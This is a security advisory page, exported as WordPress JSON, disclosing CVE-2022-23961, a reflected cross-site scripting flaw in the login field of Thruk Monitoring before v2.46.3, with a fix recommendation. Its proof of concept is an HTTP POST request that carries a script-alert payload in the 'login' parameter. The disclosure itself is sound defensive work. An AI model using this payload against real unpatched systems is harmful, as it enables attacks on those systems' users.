{"id":17863,"date":"2022-02-18T15:05:36","date_gmt":"2022-02-18T14:05:36","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=17863"},"modified":"2022-02-21T08:29:17","modified_gmt":"2022-02-21T07:29:17","slug":"usd-2021-0034","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2021-0034\/","title":{"rendered":"usd-2021-0034"},"content":{"rendered":"\n\n\n\n[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.14.7\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]

usd-2021-0034 (CVE-2022-23961)<\/span> | Thruk Monitoring<\/h1>\n

Advisory ID<\/strong>: usd-2021-0034
CVE ID<\/strong>: CVE-2022-23961
CVE URL<\/strong>: https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2022-23961<\/a>
Affected Product<\/strong>: Thruk Monitoring
Affected Version<\/strong>: < v2.46.3
Vulnerability Type<\/strong>: CWE-79<\/a>: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Security Risk<\/strong>: Medium
Vendor URL<\/strong>: https:\/\/www.thruk.org\/<\/a>
Vendor Status<\/strong>: Fixed<\/p>\n

Description<\/h3>\n

At Thruk Monitoring's login form prior v2.46.3<\/em>, the field \"login\" is vulnerable to reflected XSS payloads.<\/p>\n

Submitting invalid values into the login form's name field called \"login\" results in the output of detailed error messages. The error message contains the submitted value to the login form in plain html without any encoding or filtering being applied. Consequently, on submitting an XSS payload, it is executed.<\/p>\n

<\/span><\/p>\n

Proof of Concept (PoC)<\/h3>\n

The following request includes JavaScript within the \"login\" parameter:<\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" global_colors_info=\"{}\"]

POST \/pv\/thruk\/cgi-bin\/login.cgi HTTP\/1.1
Host: thruk.example.com
Cookie: thruk_tz=Europe\/Berlin; thruk_screen={\"height\":555,\"width\":999}
Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application\/x-www-form-urlencoded
Content-Length: 75
Origin: https:\/\/thrug.example.com
Referer: https:\/\/thrug.example.com\/pv\/thruk\/cgi-bin\/login.cgi?pv\/omd\/
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close<\/p>\n

referer=%2Fpv%2Fomd%2F&login=adfa<script>alert('XSS')<\/script>&password=adf<\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.14.7\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]

As the following screenshot indicates, the above JavaScript is embedded within the application and executed:<\/p>[\/et_pb_text][et_pb_image src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/02\/thruk-xss.png\" title_text=\"thruk-xss\" _builder_version=\"4.14.7\" _module_preset=\"default\" global_colors_info=\"{}\"][\/et_pb_image][et_pb_text _builder_version=\"4.14.7\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]

\n
\n

Fix<\/h3>\n

It is recommended to treat all input on the website as potentially dangerous. Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context.<\/p>\n

References<\/a><\/h3>\n